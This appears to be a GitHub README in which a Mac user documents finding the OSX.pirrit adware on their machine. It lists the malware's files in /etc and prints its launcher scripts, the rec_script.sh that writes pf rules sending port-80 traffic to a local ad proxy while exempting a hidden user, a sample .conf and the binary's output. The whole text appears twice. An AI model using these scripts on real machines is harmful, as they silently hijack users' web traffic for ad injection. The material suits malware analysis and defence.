dmerejkowsky/weird-mac-stuff

## weird-mac-stuff
Update: found it: it's the OSX.pirrit virus, see here:
http://www.cybereason.com/cybereason-labs-analysis-the-minds-behind-the-osx-pirrit/

Saw a bunch of those running (as root) in htop:

$ ls /etc/*.sh
/etc/Dicyemida.sh*
/etc/Fulah.sh*
/etc/Gothism.sh*
/etc/audile.sh*
/etc/axogamy.sh*
/etc/bacteriohemolysin.sh*
/etc/branchiosaurian.sh*
/etc/duello.sh*
/etc/entry.sh*
/etc/gallflowerUpd.sh*
/etc/hemodystrophy.sh*
/etc/lichenlike.sh*
/etc/overreach.sh*
/etc/retinene.sh*
/etc/run_upd.sh*
/etc/sidereally.sh*
/etc/tealess.sh*
/etc/thiocyanide.sh*
/etc/unwittingly.sh*

All the scripts look the same:

if [ -a /Library/branchiosaurian/Contents/MacOS/branchiosaurian ];
then
sleep 10
sudo pfctl -evf /etc/branchiosaurian.conf
sudo -u Benjy /Library/branchiosaurian/Contents/MacOS/branchiosaurian
fi
exit 0

Each of them has a folder in /Library/<name>.

/Library/<name>/Contents/MacOS/<name> is a Mach-O C++ executable, with deps on Qt4 frameworks stuff (core, gui and network)
and a script in Contents/MacOS/rec_script.sh which contains:

# set redirections
HIDDEN_USER=$(sudo defaults read /Library/Preferences/com.common.plist user_id)
echo $HIDDEN_USER

activeInterface=$(route get default | sed -n -e 's/^.*interface: //p')
if [ -n "$activeInterface" ]; then
    pfData="rdr pass inet proto tcp from $activeInterface to any port 80 -> 127.0.0.1 port 9882\n\
    pass out on $activeInterface route-to lo0  inet proto tcp from $activeInterface to any port 80 keep state\n\
    pass out proto tcp all user "$HIDDEN_USER"\n"
    echo "$pfData" > /etc/pf_proxy.conf
else
    echo "Unable to find active interface"
    exit 1
fi

exit 0

They also have a .conf in /etc

$ cat /etc/unwittingly.conf
rdr pass inet proto tcp from en1 to any port 80 -> 127.0.0.1 port 9882
pass out on en1 route-to lo0  inet proto tcp from en1 to any port 80 keep state
pass out proto tcp all user indianaite

And `ps aux` shows a pfctl process runnig like this:

pfctl -evf /et/<name>.conf

I managed to run one of the executables, here's the output:

./unwittingly
void AdsProxyEngine::init()Ads enabled
bool WebProxy::startProxyServer(unsigned int, QString) "/Library/Preferences/com.unwittingly.plist"
bool WebProxy::startProxyServer(unsigned int, QString) failed starting web proxy server
Started =  false
bool AdsProxyEngine::startServer() Could not start proxy server
	Update: found it: it's the OSX.pirrit virus, see here:
	http://www.cybereason.com/cybereason-labs-analysis-the-minds-behind-the-osx-pirrit/

	Saw a bunch of those running (as root) in htop:

	$ ls /etc/*.sh
	/etc/Dicyemida.sh*
	/etc/Fulah.sh*
	/etc/Gothism.sh*
	/etc/audile.sh*
	/etc/axogamy.sh*
	/etc/bacteriohemolysin.sh*
	/etc/branchiosaurian.sh*
	/etc/duello.sh*
	/etc/entry.sh*
	/etc/gallflowerUpd.sh*
	/etc/hemodystrophy.sh*
	/etc/lichenlike.sh*
	/etc/overreach.sh*
	/etc/retinene.sh*
	/etc/run_upd.sh*
	/etc/sidereally.sh*
	/etc/tealess.sh*
	/etc/thiocyanide.sh*
	/etc/unwittingly.sh*

	All the scripts look the same:

	if [ -a /Library/branchiosaurian/Contents/MacOS/branchiosaurian ];
	then
	sleep 10
	sudo pfctl -evf /etc/branchiosaurian.conf
	sudo -u Benjy /Library/branchiosaurian/Contents/MacOS/branchiosaurian
	fi
	exit 0

	Each of them has a folder in /Library/<name>.

	/Library/<name>/Contents/MacOS/<name> is a Mach-O C++ executable, with deps on Qt4 frameworks stuff (core, gui and network)
	and a script in Contents/MacOS/rec_script.sh which contains:

	# set redirections
	HIDDEN_USER=$(sudo defaults read /Library/Preferences/com.common.plist user_id)
	echo $HIDDEN_USER

	activeInterface=$(route get default \| sed -n -e 's/^.*interface: //p')
	if [ -n "$activeInterface" ]; then
	pfData="rdr pass inet proto tcp from $activeInterface to any port 80 -> 127.0.0.1 port 9882\n\
	pass out on $activeInterface route-to lo0 inet proto tcp from $activeInterface to any port 80 keep state\n\
	pass out proto tcp all user "$HIDDEN_USER"\n"
	echo "$pfData" > /etc/pf_proxy.conf
	else
	echo "Unable to find active interface"
	exit 1
	fi

	exit 0

	They also have a .conf in /etc

	$ cat /etc/unwittingly.conf
	rdr pass inet proto tcp from en1 to any port 80 -> 127.0.0.1 port 9882
	pass out on en1 route-to lo0 inet proto tcp from en1 to any port 80 keep state
	pass out proto tcp all user indianaite

	And `ps aux` shows a pfctl process runnig like this:

	pfctl -evf /et/<name>.conf

	I managed to run one of the executables, here's the output:

	./unwittingly
	void AdsProxyEngine::init()Ads enabled
	bool WebProxy::startProxyServer(unsigned int, QString) "/Library/Preferences/com.unwittingly.plist"
	bool WebProxy::startProxyServer(unsigned int, QString) failed starting web proxy server
	Started = false
	bool AdsProxyEngine::startServer() Could not start proxy server